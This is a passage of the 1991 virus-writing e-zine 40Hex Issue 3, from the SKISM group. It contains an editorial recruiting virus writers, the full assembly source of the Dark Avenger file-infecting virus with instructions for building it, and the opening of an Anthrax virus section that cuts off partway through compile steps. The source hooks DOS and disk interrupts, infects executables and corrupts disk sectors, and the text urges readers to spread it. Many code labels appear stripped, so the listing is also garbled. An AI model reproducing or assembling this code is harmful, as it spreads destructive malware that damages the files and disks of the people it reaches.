40Hex Issue 3.1 Volume 1

 40Hex Issue 3                                                      0000


  A Word From Hellraiser.......................................0001
  The Dark Avenger Source......................................0002
  The 40Hex Challenge/The Strange Case of Validate.............0004
  Application for SKISM........................................0005
  Virus News For October/91....................................0006
  The Darth Vader Virus Strain B...............................0007
  Mystery Virus................................................0008
  Tiny-F Source................................................0009


  Hellraiser...............Editor/Writer/Programmer/Tech. Consultant
  Garbage Heap.....................Writer/Spell Checker/Distribution

  Special Thanks to...  Demogorgan, Dark Angel, Count Zero, Piff',
                        Paragon Dude, The Fisch, Gambit, Punisher,
                        Nuclear Warhead, Ironlord (and the rest of
                        the alliance people all our freinds in PA, CT,
                        and all over the world, and most of all our
                        readers for your support.

    SKISM distribution sites as of 10/91

    Jihad                   - 1-(408)-XXX-XXXX : California
    The Night Eyes BBS      - 1-(717)-367-3501 : Pennsylvania
    The Punishment Due BBS  - 1-(203)-675-???? : Connecticut   * DOWN *

 40Hex Issue 3                                                      0001

          - Gray would be the color, if I had a heart.

          Well what's up.  Sorry about the delay with issue three
          but there's been a lot of stuff going down.  I've been
          working on a lot of semi-legit projects and all that so
          I haven't gotten around to 40Hex till now.

          Anyway, first big news is this.  SKISM has now co-oped
          with the New York based group PHALCON, thus broadening
          both groups span of diversity.  SKISM being an all virus
          group and PHALCON dealing with mainly h/p.

          Secondly, SKISM is hoping to broaden its membership a
          bit.  We are looking for a few good virus writers.
          Mainly what we need is some people who are very good
          at assembly code and first and foremost virus writing.
          Lame bomb writers, Q-Basic coders and such need not apply.
          We are not just looking for IBM coders, as we are also
          broading to Mac and Amiga.

          Thirdly, SKISM gained a new HQ in PA., it is called Night
          Eyes BBS.  The number is (717)-367-3501, supporting
          12/24/96/14.4 baud rates.

          Finally, The Landfill BBS, whos number is listed as the
          SKISM HQ in issue two, is no longer our HQ.  Although
          we are still on very good terms with the staff of that
          BBS, please refrain from calling it with virus related
          topics (they are no-longer h/p, just Amiga wares).  Any-
          way the new New York SKISM base should be up and running
          by tops October.  It will be called Hell On Earth and I
          myself will be sysop.

          Well enjoy...

          - Hellraiser

                             -- Appendum --

          Well about three days after writing this artical I found out
          that I am being shipped to California.  This sucks...

          Well looks like Hell On Earth will be up out there instead of
          New York.

          Call our home boards to keep in touch with the situation.  I
          can still be left mail on Night Eyes.

                            -- Appendum B --

          Well, it's been over a month since I wrote the above.  Nothing
          much has changed since then.  I'm in CA. now and without a
          system.  Phalcon members have been going off -- mostly Dark Angel,
          who has a new virus coming out, Bob Ross.  I hope I can get it
          for this issue.

          Anyway, in other news The Punishment Due - Skism distribution
          site has gone down.  I am looking for other BBS's to add the
          collection to.

          More news... There is another Hell On Earth BBS out there so
          it looks like I am going to have to change the name of my
          BBS, when I get my system.  Ironically I am concidering having
          the other Hell On Earth as a Skism distribution site.

          Even more news...  I have been getting a lot of shit cause
          of my name.  There seems to be other Hellraisers out there,
          who claim they were the first... Fuck you all!  I had the name
          since 1989, when I read Clive Barkers novella - "The Hellbound
          Heart."  If you had it before then, its yours.  However after
          calling a lot of boards nationally lately I never had a problem
          logging on due to my name.  Shows how lame people are.

          Well thats it for now... Hope this issue will be out shortly.

 40Hex Issue 3                                                      0002

                            The Dark Avenger

    - We are demons to some, angels to others.

    Well, here it is.  Here is the first major virus source, from the
    man who brought us such greats as V2000, Anthrax, and V2100 to name
    a few.  Well this Bulgarian metal lover was nice enough to freely
    distribute the source code to his first virus.

; "Blessed is he who expects nothing, for he shall not be disappointed."
; The original source of one of the first Bulgarian viruses is in front of
; you.  As you may notice, it's full of rubbish and bugs, but nevertheless
; the virus has spread surprisingly quickly troughout the country and made a
; quick round the globe.  (It's well-known in Eastern and Western Europe, as
; well as in USA.) Due to the aniversary of its creation, the source is
; distributed freely.  You have the rights to distribute the source which can
; be charged or free of charge, with the only condition not to modify it.
; The one, who intentionaly distributes this source modified in any way will
; be punished!  Still, the author will be glad if any of you improves it and
; spreads the resulting executive file (i.e., the virus itself).  Pay
; attention to the fact that after you assemble the source, the resulting
; .COM-file cannot be run.  For that purpose you have to create a three-byte
; file, consisting of the hex numbers 0e9h, 68h, 0 and then to combine the
; two files.  Don't try to place a JMP at the beginning of the source.
; DISCLAIMER: The author does not take any responsability for any damage,
; either direct or implied, caused by the usage or not of this source or of
; the resulting code after assembly. No warrant is made about the product
; functionability or quality.
; I cannot resist to express my special gratitude to my "populazer" Dipl.
; eng. Vesselin Bontchev, who makes me famous and who, wishing it or
; not, helps very much in the spreading of my viruses, in spite of the fact
; that he tries to do just the opposite (writing programs in C has never
; led to any good).
; Greetings to all virus writers!
code    segment
        assume  cs:code,ds:code
        db      'Eddie lives...somewhere in time!',0
        dd      12239000h
        db      30
; Return the control to an .EXE file:
; Restores DS=ES=PSP, loads SS:SP and CS:IP.

        mov     bx,es
        add     bx,10h
        add     bx,word ptr cs:[si+call_adr+2]
        mov     word ptr cs:[si+patch+2],bx
        mov     bx,word ptr cs:[si+call_adr]
        mov     word ptr cs:[si+patch],bx
        mov     bx,es
        add     bx,10h
        add     bx,word ptr cs:[si+stack_pointer+2]
        mov     ss,bx
        mov     sp,word ptr cs:[si+stack_pointer]
        db      0eah                    ;JMP XXXX:YYYY
        dd      0
; Returns control to a .COM file:
; Restores the first 3 bytes in the
; beginning of the file, loads SP and IP.

        mov     di,100h
        add     si,offset my_save
        mov     sp,ds:[6]               ;This is incorrect
        xor     bx,bx
        push    bx
        jmp     [si-11]                 ;si+call_adr-top_file
; Program entry point
        call    relative
        pop     si                      ;SI = $
        sub     si,offset relative
        cmp     word ptr cs:[si+my_save],5a4dh
        je      exe_ok
        mov     sp,si                   ;A separate stack is supported for
        add     sp,offset top_file+100h ;the .COM files, in order not to
        sti                             ;overlap the stack by the program
        cmp     sp,ds:[6]
        jnc     exit_com
        push    ax
        push    es
        push    si
        push    ds
        mov     di,si
; Looking for the address of INT 13h handler in ROM-BIOS
        xor     ax,ax
        push    ax
        mov     ds,ax
        les     ax,ds:[13h*4]
        mov     word ptr cs:[si+fdisk],ax
        mov     word ptr cs:[si+fdisk+2],es
        mov     word ptr cs:[si+disk],ax
        mov     word ptr cs:[si+disk+2],es
        mov     ax,ds:[40h*4+2]         ;The INT 13h vector is moved to INT 40h
        cmp     ax,0f000h               ;for diskettes if a hard disk is
        jne     nofdisk                 ;available
        mov     word ptr cs:[si+disk+2],ax
        mov     ax,ds:[40h*4]
        mov     word ptr cs:[si+disk],ax
        mov     dl,80h
        mov     ax,ds:[41h*4+2]         ;INT 41h usually points the segment,
        cmp     ax,0f000h               ;where the original INT 13h vector is
        je      isfdisk
        cmp     ah,0c8h
        jc      nofdisk
        cmp     ah,0f4h
        jnc     nofdisk
        test    al,7fh
        jnz     nofdisk
        mov     ds,ax
        cmp     ds:[0],0aa55h
        jne     nofdisk
        mov     dl,ds:[2]
        mov     ds,ax
        xor     dh,dh
        mov     cl,9
        shl     dx,cl
        mov     cx,dx
        xor     si,si
        lodsw                           ;Occasionally begins with:
        cmp     ax,0fa80h               ;       CMP     DL,80h
        jne     altchk                  ;       JNC     somewhere
        cmp     ax,7380h
        je      intchk
        jne     nxt0
        cmp     ax,0c2f6h               ;or with:
        jne     nxt                     ;       TEST    DL,80h
        lodsw                           ;       JNZ     somewhere
        cmp     ax,7580h
        jne     nxt0
        inc     si                      ;then there is:
        lodsw                           ;       INT     40h
        cmp     ax,40cdh
        je      found
        sub     si,3
        dec     si
        dec     si
        dec     si
        loop    findvect
        jmp     short nofdisk
        sub     si,7
        mov     word ptr cs:[di+fdisk],si
        mov     word ptr cs:[di+fdisk+2],ds
        mov     si,di
        pop     ds
; Check whether the program is present in memory:
        les     ax,ds:[21h*4]
        mov     word ptr cs:[si+save_int_21],ax
        mov     word ptr cs:[si+save_int_21+2],es
        push    cs
        pop     ds
        cmp     ax,offset int_21
        jne     bad_func
        xor     di,di
        mov     cx,offset my_size
        jne     bad_func
        loop    scan_func
        pop     es
        jmp     go_program
; Move the program to the top of memory:
; (it's full of rubbish and bugs here)
        pop     es
        mov     ah,49h
        int     21h
        mov     bx,0ffffh
        mov     ah,48h
        int     21h
        sub     bx,(top_bz+my_bz+1ch-1)/16+2
        jc      go_program
        mov     cx,es
        adc     cx,bx
        mov     ah,4ah
        int     21h
        mov     bx,(offset top_bz+offset my_bz+1ch-1)/16+1
        sbb     es:[2],bx
        push    es
        mov     es,cx
        mov     ah,4ah
        int     21h
        mov     ax,es
        dec     ax
        mov     ds,ax
        mov     word ptr ds:[1],8
        call    mul_16
        mov     bx,ax
        mov     cx,dx
        pop     ds
        mov     ax,ds
        call    mul_16
        add     ax,ds:[6]
        adc     dx,0
        sub     ax,bx
        sbb     dx,cx
        jc      mem_ok
        sub     ds:[6],ax               ;Reduction of the segment size
        pop     si
        push    si
        push    ds
        push    cs
        xor     di,di
        mov     ds,di
        lds     ax,ds:[27h*4]
        mov     word ptr cs:[si+save_int_27],ax
        mov     word ptr cs:[si+save_int_27+2],ds
        pop     ds
        mov     cx,offset aux_size
        rep     movsb
        xor     ax,ax
        mov     ds,ax
        mov     ds:[21h*4],offset int_21;Intercept INT 21h and INT 27h
        mov     ds:[21h*4+2],es
        mov     ds:[27h*4],offset int_27
        mov     ds:[27h*4+2],es
        mov     word ptr es:[filehndl],ax
        pop     es
        pop     si
; Smash the next disk sector:
        xor     ax,ax
        mov     ds,ax
        mov     ax,ds:[13h*4]
        mov     word ptr cs:[si+save_int_13],ax
        mov     ax,ds:[13h*4+2]
        mov     word ptr cs:[si+save_int_13+2],ax
        mov     ds:[13h*4],offset int_13
        add     ds:[13h*4],si
        mov     ds:[13h*4+2],cs
        pop     ds
        push    ds
        push    si
        mov     bx,si
        lds     ax,ds:[2ah]
        xor     si,si
        mov     dx,si
scan_envir:                             ;Fetch program's name
        lodsw                           ;(with DOS 2.x it doesn't work anyway)
        dec     si
        test    ax,ax
        jnz     scan_envir
        add     si,3
; The following instruction is a complete nonsense.  Try to enter a drive &
; directory path in lowercase, then run an infected program from there.
; As a result of an error here + an error in DOS the next sector is not
; smashed. Two memory bytes are smashed instead, most probably onto the
; infected program.
        sub     al,'A'
        mov     cx,1
        push    cs
        pop     ds
        add     bx,offset int_27
        push    ax
        push    bx
        push    cx
        int     25h
        pop     ax
        pop     cx
        pop     bx
        inc     byte ptr [bx+0ah]
        and     byte ptr [bx+0ah],0fh   ;It seems that 15 times doing
        jnz     store_sec               ;nothing is not enough for some.
        mov     al,[bx+10h]
        xor     ah,ah
        mul     word ptr [bx+16h]
        add     ax,[bx+0eh]
        push    ax
        mov     ax,[bx+11h]
        mov     dx,32
        mul     dx
        div     word ptr [bx+0bh]
        pop     dx
        add     dx,ax
        mov     ax,[bx+8]
        add     ax,40h
        cmp     ax,[bx+13h]
        jc      store_new
        inc     ax
        and     ax,3fh
        add     ax,dx
        cmp     ax,[bx+13h]
        jnc     small_disk
        mov     [bx+8],ax
        pop     ax
        xor     dx,dx
        push    ax
        push    bx
        push    cx
        int     26h

; The writing trough this interrupt is not the smartest thing, bacause it
; can be intercepted (what Vesselin Bontchev has managed to notice).
        pop     ax
        pop     cx
        pop     bx
        pop     ax
        cmp     byte ptr [bx+0ah],0
        jne     not_now
        mov     dx,[bx+8]
        pop     bx
        push    bx
        int     26h
        pop     ax
        pop     si
        xor     ax,ax
        mov     ds,ax
        mov     ax,word ptr cs:[si+save_int_13]
        mov     ds:[13h*4],ax
        mov     ax,word ptr cs:[si+save_int_13+2]
        mov     ds:[13h*4+2],ax
        pop     ds
        pop     ax
        cmp     word ptr cs:[si+my_save],5a4dh
        jne     go_exit_com
        jmp     exit_exe
        jmp     exit_com
        mov     al,3                    ;This instruction seems unnecessary
; INT 27h handler (this is necessary)
        call    alloc
        jmp     dword ptr cs:[save_int_27]
; During the DOS functions Set & Get Vector it seems that the virus has not
; intercepted them (this is a doubtfull advantage and it is a possible
; source of errors with some "intelligent" programs)
        mov     word ptr cs:[save_int_27],dx
        mov     word ptr cs:[save_int_27+2],ds
        mov     word ptr cs:[save_int_21],dx
        mov     word ptr cs:[save_int_21+2],ds
        les     bx,dword ptr cs:[save_int_27]
        les     bx,dword ptr cs:[save_int_21]

        call    do_file
        call    alloc
        jmp     dword ptr cs:[save_int_21]
        db      'Diana P.',0
; INT 21h handler.  Infects files during execution, copying, browsing or
; creating and some other operations. The execution of functions 0 and 26h
; has bad consequences.
        push    bp
        mov     bp,sp
        push    [bp+6]
        pop     bp
        call    ontop
        cmp     ax,2521h
        je      set_int_21
        cmp     ax,2527h
        je      set_int_27
        cmp     ax,3521h
        je      get_int_21
        cmp     ax,3527h
        je      get_int_27
        cmp     ax,4b00h
        je      exec
        cmp     ah,3ch
        je      create
        cmp     ah,3eh
        je      close
        cmp     ah,5bh
        jne     not_create
        cmp     word ptr cs:[filehndl],0;May be 0 if the file is open
        jne     dont_touch
        call    see_name
        jnz     dont_touch
        call    alloc
        call    function
        jc      int_exit
        push    es
        push    cs
        pop     es
        push    si
        push    di
        push    cx
        push    ax
        mov     di,offset filehndl
        mov     si,dx
        mov     cx,65
        test    al,al
        jz      all_ok
        loop    move_name
        mov     word ptr es:[filehndl],cx
        pop     ax
        pop     cx
        pop     di
        pop     si
        pop     es
        jnc     int_exit                ;JMP
        cmp     bx,word ptr cs:[filehndl]
        jne     dont_touch
        test    bx,bx
        jz      dont_touch
        call    alloc
        call    function
        jc      int_exit
        push    ds
        push    cs
        pop     ds
        push    dx
        mov     dx,offset filehndl+2
        call    do_file
        mov     word ptr cs:[filehndl],0
        pop     dx
        pop     ds
        jmp     go_exit
        cmp     ah,3dh
        je      touch
        cmp     ah,43h
        je      touch
        cmp     ah,56h                  ;Unfortunately, the command inter-
        jne     dont_touch              ;preter does not use this function
        call    see_name
        jnz     dont_touch
        call    do_file
        call    alloc
        call    function
        push    ds
        call    get_chain
        mov     byte ptr ds:[0],'Z'
        pop     ds
dummy   proc    far                     ;???
        ret     2
dummy   endp
; Checks whether the file is .COM or .EXE.
; It is not called upon file execution.
        push    ax
        push    si
        mov     si,dx
        test    al,al
        jz      bad_name
        cmp     al,'.'
        jnz     scan_name
        call    get_byte
        mov     ah,al
        call    get_byte
        cmp     ax,'co'
        jz      pos_com
        cmp     ax,'ex'
        jnz     good_name
        call    get_byte
        cmp     al,'e'
        jmp     short good_name
        call    get_byte
        cmp     al,'m'
        jmp     short good_name
        inc     al
        pop     si
        pop     ax
; Converts into lowercase (the subroutines are a great thing).
        cmp     al,'C'
        jc      byte_got
        cmp     al,'Y'
        jnc     byte_got
        add     al,20h
; Calls the original INT 21h.
        call    dword ptr cs:[save_int_21]
; Arrange to infect an executable file.
        push    ds                      ;Save the registers in stack
        push    es
        push    si
        push    di
        push    ax
        push    bx
        push    cx
        push    dx
        mov     si,ds
        xor     ax,ax
        mov     ds,ax
        les     ax,ds:[24h*4]           ;Saves INT 13h and INT 24h in stack
        push    es                      ;and changes them with what is needed
        push    ax
        mov     ds:[24h*4],offset int_24
        mov     ds:[24h*4+2],cs
        les     ax,ds:[13h*4]
        mov     word ptr cs:[save_int_13],ax
        mov     word ptr cs:[save_int_13+2],es
        mov     ds:[13h*4],offset int_13
        mov     ds:[13h*4+2],cs
        push    es
        push    ax
        mov     ds,si
        xor     cx,cx                   ;Arranges to infect Read-only files
        mov     ax,4300h
        call    function
        mov     bx,cx
        and     cl,0feh
        cmp     cl,bl
        je      dont_change
        mov     ax,4301h
        call    function
        push    ds
        push    dx
        push    bx
        mov     ax,3d02h                ;Now we can safely open the file
        call    function
        jc      cant_open
        mov     bx,ax
        call    disease
        mov     ah,3eh                  ;Close it

        call    function
        pop     cx
        pop     dx
        pop     ds
        jnc     no_update
        mov     ax,4301h                ;Restores file's attributes
        call    function                ;if they were changed (just in case)
        xor     ax,ax                   ;Restores INT 13h and INT 24h
        mov     ds,ax
        pop     ds:[13h*4]
        pop     ds:[13h*4+2]
        pop     ds:[24h*4]
        pop     ds:[24h*4+2]
        pop     dx                      ;Register restoration
        pop     cx
        pop     bx
        pop     ax
        pop     di
        pop     si
        pop     es
        pop     ds
; This routine is the working horse.
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     dx,offset top_save      ;Read the file beginning
        mov     cx,18h
        mov     ah,3fh
        int     21h
        xor     cx,cx
        xor     dx,dx
        mov     ax,4202h                ;Save file length
        int     21h
        mov     word ptr [top_save+1ah],dx
        cmp     ax,offset my_size       ;This should be top_file
        sbb     dx,0
        jc      stop_fuck_2             ;Small files are not infected
        mov     word ptr [top_save+18h],ax
        cmp     word ptr [top_save],5a4dh
        jne     com_file
        mov     ax,word ptr [top_save+8]
        add     ax,word ptr [top_save+16h]
        call    mul_16
        add     ax,word ptr [top_save+14h]
        adc     dx,0
        mov     cx,dx
        mov     dx,ax
        jmp     short see_sick
        cmp     byte ptr [top_save],0e9h
        jne     see_fuck
        mov     dx,word ptr [top_save+1]
        add     dx,103h
        jc      see_fuck
        dec     dh
        xor     cx,cx
; Check if the file is properly infected

        sub     dx,startup-copyright
        sbb     cx,0
        mov     ax,4200h
        int     21h
        add     ax,offset top_file
        adc     dx,0
        cmp     ax,word ptr [top_save+18h]
        jne     see_fuck
        cmp     dx,word ptr [top_save+1ah]
        jne     see_fuck
        mov     dx,offset top_save+1ch
        mov     si,dx
        mov     cx,offset my_size
        mov     ah,3fh
        int     21h
        jc      see_fuck
        cmp     cx,ax
        jne     see_fuck
        xor     di,di

        jne     see_fuck
        loop    next_byte
        xor     cx,cx                   ;Seek to the end of file
        xor     dx,dx
        mov     ax,4202h
        int     21h
        cmp     word ptr [top_save],5a4dh
        je      fuck_exe
        add     ax,offset aux_size+200h ;Watch out for too big .COM files
        adc     dx,0
        je      fuck_it
; Pad .EXE files to paragraph boundary. This is absolutely unnecessary.
        mov     dx,word ptr [top_save+18h]
        neg     dl
        and     dx,0fh
        xor     cx,cx
        mov     ax,4201h
        int     21h
        mov     word ptr [top_save+18h],ax
        mov     word ptr [top_save+1ah],dx
        mov     ax,5700h                ;Get file's date
        int     21h
        push    cx
        push    dx
        cmp     word ptr [top_save],5a4dh
        je      exe_file                ;Very clever, isn't it?
        mov     ax,100h
        jmp     short set_adr
        mov     ax,word ptr [top_save+14h]
        mov     dx,word ptr [top_save+16h]
        mov     di,offset call_adr
        mov     ax,dx
        mov     ax,word ptr [top_save+10h]
        mov     ax,word ptr [top_save+0eh]
        mov     si,offset top_save      ;This offers the possibilities to
        movsb                           ;some nasty programs to restore
        movsw                           ;exactly the original length
        xor     dx,dx                   ;of the .EXE files
        mov     cx,offset top_file
        mov     ah,40h
        int     21h                     ;Write the virus
        jc      go_no_fuck              ;(don't trace here)
        xor     cx,ax
        jnz     go_no_fuck
        mov     dx,cx
        mov     ax,4200h
        int     21h
        cmp     word ptr [top_save],5a4dh
        je      do_exe
        mov     byte ptr [top_save],0e9h
        mov     ax,word ptr [top_save+18h]
        add     ax,startup-copyright-3
        mov     word ptr [top_save+1],ax
        mov     cx,3
        jmp     short write_header
        jmp     short no_fuck
; Construct the .EXE file's header
        call    mul_hdr
        not     ax
        not     dx
        inc     ax
        jne     calc_offs
        inc     dx
        add     ax,word ptr [top_save+18h]
        adc     dx,word ptr [top_save+1ah]
        mov     cx,10h
        div     cx
        mov     word ptr [top_save+14h],startup-copyright
        mov     word ptr [top_save+16h],ax
        add     ax,(offset top_file-offset copyright-1)/16+1
        mov     word ptr [top_save+0eh],ax
        mov     word ptr [top_save+10h],100h
        add     word ptr [top_save+18h],offset top_file
        adc     word ptr [top_save+1ah],0
        mov     ax,word ptr [top_save+18h]
        and     ax,1ffh
        mov     word ptr [top_save+2],ax
        mov     ax,word ptr [top_save+19h]
        shr     byte ptr [top_save+1bh],1
        rcr     ax,1
        jz      update_len
        inc     ax
        mov     word ptr [top_save+4],ax
        mov     cx,18h
        mov     dx,offset top_save
        mov     ah,40h
        int     21h                     ;Write the file beginning
        pop     dx
        pop     cx
        jc      stop_fuck
        mov     ax,5701h                ;Restore the original file date
        int     21h
; The following is used by the INT 21h and INT 27h handlers in connection
; to the program hiding in memory from those who don't need to see it.
; The whole system is absurde and meaningless and it is also another source
; for program conflicts.
        push    ds
        call    get_chain
        mov     byte ptr ds:[0],'M'
        pop     ds
; Assures that the program is the first one in the processes,
; which have intercepted INT 21h (yet another source of conflicts).
        push    ds
        push    ax
        push    bx
        push    dx
        xor     bx,bx
        mov     ds,bx
        lds     dx,ds:[21h*4]
        cmp     dx,offset int_21
        jne     search_segment
        mov     ax,ds
        mov     bx,cs
        cmp     ax,bx
        je      test_complete
; Searches the segment of the sucker who has intercepted INT 21h, in
; order to find where it has stored the old values and to replace them.
; Nothing is done for INT 27h.
        xor     bx,bx
        mov     ax,[bx]
        cmp     ax,offset int_21
        jne     search_next
        mov     ax,cs
        cmp     ax,[bx+2]
        je      got_him
        inc     bx
        jne     search_segment
        je      return_control
        mov     ax,word ptr cs:[save_int_21]
        mov     [bx],ax
        mov     ax,word ptr cs:[save_int_21+2]
        mov     [bx+2],ax
        mov     word ptr cs:[save_int_21],dx
        mov     word ptr cs:[save_int_21+2],ds
        xor     bx,bx
; Even if he has not saved them in the same segment, this won't help him.
        mov     ds,bx
        mov     ds:[21h*4],offset int_21
        mov     ds:[21h*4+2],cs
        pop     dx
        pop     bx
        pop     ax
        pop     ds
; Fetch the segment of the last MCB
        push    ax
        push    bx
        mov     ah,62h
        call    function
        mov     ax,cs
        dec     ax
        dec     bx
        mov     ds,bx
        adc     bx,ds:[3]
        cmp     bx,ax
        jc      next_blk
        pop     bx
        pop     ax
; Multiply by 16
        mov     ax,word ptr [top_save+8]
        mov     dx,10h
        mul     dx
        db      'This program was written in the city of Sofia '
        db      '(C) 1988-89 Dark Avenger',0
; INT 13h handler.
; Calls the original vectors in BIOS, if it's a writing call
        cmp     ah,3
        jnz     subfn_ok
        cmp     dl,80h
        jnc     hdisk
        db      0eah                    ;JMP XXXX:YYYY
my_size:                                ;--- Up to here comparison
disk:                                   ; with the original is made
        dd      0
        db      0eah                    ;JMP XXXX:YYYY
        dd      0
        db      0eah                    ;JMP XXXX:YYYY
        dd      0
        dd      100h
        dd      0                       ;The original value of SS:SP
        int     20h                     ;The original contents of the first
        nop                             ;3 bytes of the file
top_file:                               ;--- Up to here the code is written
filehndl    equ $                       ; in the files
filename    equ filehndl+2              ;Buffer for the name of the opened file
save_int_27 equ filename+65             ;Original INT 27h vector
save_int_21 equ save_int_27+4           ;Original INT 21h vector
aux_size    equ save_int_21+4           ;--- Up to here is moved into memory
top_save    equ save_int_21+4           ;Beginning of the buffer, which
                                        ; - The first 24 bytes read from file
                                        ; - File length (4 bytes)
                                        ; - The last bytes of the file
                                        ;   (my_size bytes)
top_bz      equ top_save-copyright
my_bz       equ my_size-copyright

code    ends


     A few notes on assembling this virus.

     It's a little bit tricky assembling the Dark Avenger Virus.  Use
     these steps below.  I use Turbo Assembler 2.0, but I'm positve that
     MASM will work just as well.




     Now make a 3 byte file named JUMP.TMP using DEBUG like this

     4:  DEBUG

         n jmp.tmp
         e 0100  E9 68 00



         There you have it....

 40Hex Issue 3                                                      0003


    Well, this is turning out to be a tribute issue to the Dark
    Avenger.  Here is another one of his better known viruses.  This is
    a nice one cause it not only is a file infector, but it is also a
    sort of boot sector virus.  It is also what I dubbed a reincarnation
    virus, meaning that even if you clean your system of it, it may
    still live, because it leaves a copy of itself on the last sector of
    the disk.  The virus can be reincarnated by the V2100 virus, also bu
    The Dark Avenger.

    Well, Patti Hoffman (one of my favorite people on earth, not) wrote
    this virus up.

 V Status:    Rare [Not for long]
 Discovery:   July, 1990
 Symptoms:    .COM & .EXE growth
 Origin:      Bulgaria
 Isolated:    Netherlands
 Eff Length:  1040 - 1279 Bytes
 Type Code:   PRAKX - Parasitic Resident .COM, .EXE, & Partition Table Infector
 Detection Method:  ViruScan V66+, Pro-Scan 2.01+, IBM Scan 2.00+
 Removal Instructions: Scan/D + MDisk/P, Pro-Scan 2.01+
 General Comments:
       The Anthrax Virus was isolated in July 1990 in the Netherlands after
       it was uploaded onto several BBSes in a trojan anti-viral program,
       USCAN.ZIP.  It is the second virus to be found in a copy of UScan
       during July 1990, the first virus being V2100.  Anthrax is a memory
       resident generic infector of .COM and .EXE files, including

       The first time a program infected with the Anthrax virus is executed
       on the system's hard disk, the virus will infect the hard disk's
       partition table.  At this point, the virus is not memory resident.  It
       will also write a copy of itself on the last few sectors of the
       system's hard disk.  If data existed on those last few sectors of the
       hard disk, it will be destroyed.

       When the system is booted from the hard disk, the Anthrax virus
       will install itself memory resident.  It will remain memory resident
       until the first program is executed.  At that time, it will deinstall
       itself from being resident and infect one .COM or .EXE file.  This
       virus does not infect files in the current directory first, but
       instead starts to infect files at the lowest level of the disk's
       directory tree.

       Later, when an infected program is executed, Anthrax will infect one
       .COM or .EXE file, searching the directory structure from the lowest
       level of the directory tree.  If the executed infected program
       was located on the floppy drive, a .COM or .EXE file may or may not
       be infected.

       The Anthrax Virus's code is 1,024 bytes long, but infected programs
       will increase in length by 1,040 to 1,279 bytes.  On the author's test
       system, the largest increase in length experienced was 1,232 bytes.
       Infected files will always have an infected file length that is a
       multiple of 16.

       The following text strings can be found in files infected with the
       Anthrax virus:

               "(c)Damage, Inc."

       A third text string occurs in the viral code, but it is in Cyrillics.
       Per Vesselin Bontchev, this third string translates to: "Sofia 1990".

       Since Anthrax infects the hard disk partition tables, infected systems
       must have the partition table disinfected or rebuilt in order to
       remove the virus.  This disinfection can be done with either a low-
       level format or use of the MDisk/P program for the correct DOS
       version after powering off and rebooting from a write-protected boot
       diskette for the system.  Any .COM or .EXE files infected with
       Anthrax must also be disinfected or erased.  Since a copy of the virus
       will exist on the last few sectors of the drive, these must also be
       located and overwritten.

       Anthrax interacts with another virus: V2100.  If a system which was
       previously infected with Anthrax should become infected with the V2100
       virus, the V2100 virus will check the last few sectors of the hard
       disk for the spare copy of Anthrax.  If the spare copy is found, then
       Anthrax will be copied to the hard disk's partition table.

       It is not known if Anthrax carries any destructive capabilities or
       trigger/activation dates.

       Here is the actual virus.  Well if this is your fist copy of
       40Hex, let me explain how to compile it.

       First copy what is below with your editor.  Then save it to a file
       called ANTHRAX.SCR.  Then type at the command line -
